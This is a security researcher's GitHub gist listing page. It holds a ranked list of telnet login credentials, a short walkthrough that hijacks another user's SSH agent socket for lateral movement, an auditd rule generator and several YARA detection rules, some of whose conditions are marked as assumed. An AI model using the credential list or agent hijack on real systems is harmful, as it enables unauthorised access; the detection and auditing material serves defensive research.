Tim Brown timb-machine

View GitHub Profile
@timb-machine
timb-machine / Telnet authentication strings
Created February 13, 2021 19:36
Telnet authentication strings
461 root
392
160 admin
94 default
39 guest
24 support
21 user
20 1234
16 password
15 12345

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]

user@internal:~$ hostname -f
internal.company.tld
@timb-machine
timb-machine / auditd-generate-rule.sh
Last active February 28, 2021 08:33
auditd-generate-rule.sh
#!/bin/sh
# Emit one auditd file-watch rule per path read from stdin.
# $1 = permissions to watch (e.g. wa), $2 = rule key (-k) used to tag matching events.
generate_file_rule () {
filepermissions="${1}"
rulename="${2}"
# -r keeps backslashes in paths intact; each line of stdin is one path to watch
while read -r filename
do
printf -- "-w %s -p %s -k %s\n" "${filename}" "${filepermissions}" "${rulename}"
done
}
# usage: find /etc -type f | generate_file_rule wa etc-files >> /etc/audit/rules.d/etc.rules
@timb-machine
timb-machine / aix.yara
Created February 28, 2021 19:18
aix.yara
rule aix {
meta:
author = "Tim Brown @timb_machine"
description = "AIX binary"
strings:
$libca = "libc.a"
$text = ".text"
$data = ".data"
condition:
$libca and $text and $data
}
@timb-machine
timb-machine / accept-environment.patch
Created February 28, 2021 20:41
accept-environment.patch
Description: Accept environment changes.
Accept environment changes during negotiation by the client.
Author: Tim Brown <[email protected]>
---
The information above should follow the Patch Tagging Guidelines, please
check out http://dep.debian.net/deps/dep3/ to learn about the format. Here
are templates for supplementary fields that you might want to add:
Origin: <vendor|upstream|other>, <url of original patch>
@timb-machine
timb-machine / ciscotools.yara
Created February 28, 2021 21:28
ciscotools.yara
rule ciscotools {
meta:
author = "Tim Brown @timb_machine"
description = "Cisco tools"
strings:
$labs = "labs.portcullis.co.uk"
$portcullislabs = "portcullislabs"
$CiscoCXSecurity = "CiscoCXSecurity"
$timb_machine = "timb_machine"
$pentestmonkey = "pentestmonkey"
condition:
// the gist preview is cut off here; this condition is assumed so the rule compiles
any of them
}
@timb-machine
timb-machine / adonunix2.yara
Last active March 1, 2021 11:14
adonunix2.yara
rule adonunix2 {
meta:
author = "Tim Brown @timb_machine"
description = "AD on UNIX"
strings:
$quest = "/quest"
$sss = "/sss"
$pbis = "/pbis"
$ipa = "/ipa"
$samba = "/samba"
condition:
// the gist preview is cut off here; this condition is assumed so the rule compiles
any of them
}
@timb-machine
timb-machine / enterpriseunix2.yara
Last active March 1, 2021 18:13
enterpriseunix2.yara
import "elf"
rule enterpriseunix2 {
meta:
author = "Tim Brown @timb_machine"
description = "Enterprise UNIX"
strings:
$aix = "aix" nocase
$solaris = "solaris" nocase
$hpux = "hpux" nocase
condition:
// the gist preview is cut off here; this condition is assumed so the rule compiles
any of them
}
@timb-machine
timb-machine / enterpriseapps2.yara
Last active March 1, 2021 18:19
enterpriseapps2.yara
import "elf"
rule enterpriseapps2 {
meta:
author = "Tim Brown @timb_machine"
description = "Enterprise apps"
strings:
$db2 = "db2" nocase
$oracle = "oracle" nocase
$mysql = "mysql" nocase
condition:
// the gist preview is cut off here; this condition is assumed so the rule compiles
any of them
}